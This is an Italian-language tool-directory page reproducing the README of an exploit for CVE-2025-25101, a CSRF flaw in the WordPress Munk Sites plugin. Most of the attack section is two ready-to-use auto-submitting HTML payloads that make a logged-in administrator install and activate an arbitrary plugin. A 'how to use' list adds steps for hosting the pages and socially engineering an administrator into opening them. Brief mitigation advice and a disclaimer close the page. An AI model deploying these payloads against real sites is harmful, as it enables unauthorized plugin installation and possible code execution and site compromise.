Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-25101 — WordPress Munk Sites plugin <= 1.0.7 - Vulnerabilità CSRF per installazione arbitraria di plugin | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-25101
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPhishingIngegneria SocialeApprendimento e Formazione
GitHubnxploited/cve-2025-25101

CVE-2025-25101

WordPress Munk Sites plugin <= 1.0.7 - Vulnerabilità CSRF per installazione arbitraria di plugin

Vedi Repository
1121 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🚀 CVE-2025-25101 - Plugin Munk Sites per WordPress <= 1.0.7 - CSRF per Installazione Arbitraria di Plugin

📌 Panoramica

CVE-2025-25101 è una vulnerabilità di Cross-Site Request Forgery (CSRF) nel plugin MetricThemes Munk Sites per WordPress (versioni ≤ 1.0.7).
Questa vulnerabilità consente a un attaccante non autenticato di indurre un amministratore a installare e attivare plugin arbitrari, potenzialmente portando a Remote Code Execution (RCE) o compromissione del sito web.

🛑 Versioni Affette

  • Plugin Munk Sites <= 1.0.7
  • WordPress Qualsiasi versione in cui il plugin è attivo

🛡️ Valutazione di Sicurezza (Punteggio CVSS)

PunteggioSeveritàVersioneStringa del Vettore
9.6🔥 CRITICA3.1CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

🔥 Descrizione dell'Exploit

🛠️ Come Funziona la Vulnerabilità:

Il difetto CSRF nel plugin Munk Sites consente a un attaccante di forzare un amministratore WordPress connesso a installare e attivare qualsiasi plugin WordPress senza il suo consenso.
Ciò viene fatto sfruttando una richiesta admin-ajax.php non protetta che manca della verifica del token CSRF.

📌 Flusso di Lavoro dell'Exploit:

  1. L'attaccante crea una pagina web malevola contenente il payload CSRF.
  2. La vittima (amministratore WordPress) visita la pagina web dell'attaccante.
  3. L'exploit invia silenziosamente richieste a WordPress per installare e attivare un plugin arbitrario.
  4. Il plugin viene installato e attivato senza alcuna interazione dell'amministratore.

💻 Codice dell'Exploit

1️⃣ Exploit CSRF - Installa Plugin

Questo payload costringe la vittima a installare il plugin hello-world.

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF Exploit - Plugin Installation</title>
    <style>
        body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
        h1 { color: #d9534f; } h2 { color: #5bc0de; }
        .output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
        .success { color: #5cb85c; font-weight: bold; }
    </style>
</head>
<body onload="document.forms[0].submit()">
    <h1>📌 CVE-2025-25101</h1>
    <h2>CSRF Exploit - Install 'Hello World' Plugin</h2>
    <h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
    <div class="output" id="output">🔄 Installing plugin...</div>
    <form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
        <input type="hidden" name="action" value="cs_install_plugin">
        <input type="hidden" name="plugin" value="hello-world">
    </form>
    <script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin installed successfully!</span>"; }, 5000);</script>
</body>
</html>

2️⃣ Exploit CSRF - Attiva Plugin

Questo payload costringe la vittima ad attivare il plugin hello-world.

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF Exploit - Plugin Activation</title>
    <style>
        body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
        h1 { color: #d9534f; } h2 { color: #f0ad4e; }
        .output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
        .success { color: #5cb85c; font-weight: bold; }
    </style>
</head>
<body onload="document.forms[0].submit()">
    <h1>📌 CVE-2025-25101</h1>
    <h2>CSRF Exploit - Activate 'Hello World' Plugin</h2>
    <h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
    <div class="output" id="output">🔄 Activating plugin...</div>
    <form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
        <input type="hidden" name="action" value="cs_active_plugin">
        <input type="hidden" name="plugin" value="hello-world">
    </form>
    <script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin activated successfully!</span>"; }, 5000);</script>
</body>
</html>

🔥 Come Usare

  1. Ospita i file HTML malevoli (install.html e activate.html) su un server controllato dall'attaccante.
  2. Fai ingegneria sociale a un amministratore WordPress per visitare install.html.
  3. Una volta installato il plugin, ingannalo per fargli visitare activate.html.
  4. Il plugin hello-world verrà installato e attivato senza il consenso dell'amministratore!

🚧 Mitigazione

🔒 Come Proteggere il Tuo Sito WordPress:

  • Aggiorna all'ultima versione del plugin Munk Sites (se è disponibile una patch).
  • Usa un plugin di sicurezza WordPress come Wordfence o Sucuri per bloccare i tentativi CSRF.
  • Limita l'accesso a admin-ajax.php utilizzando regole di sicurezza in .htaccess o nella configurazione di Nginx.
  • Assicurati che solo utenti autenticati e autorizzati possano installare o attivare plugin.
  • Implementa la protezione CSRF usando wp_nonce_field() e check_admin_referer().

📜 Disclaimer

⚠️ Questo exploit è solo a scopo educativo e di ricerca sulla sicurezza.
⚠️ L'uso non autorizzato contro sistemi senza esplicito permesso è illegale.
⚠️ L'autore non è responsabile per qualsiasi uso improprio di questo codice.


⭐ Supporto e Contributi

Se trovi utile questa ricerca, sentiti libero di ⭐ mettere una stella al repository e contribuire segnalando nuove vulnerabilità.

Di: Nxploit | Khaled Alenazi

Scarica lo strumento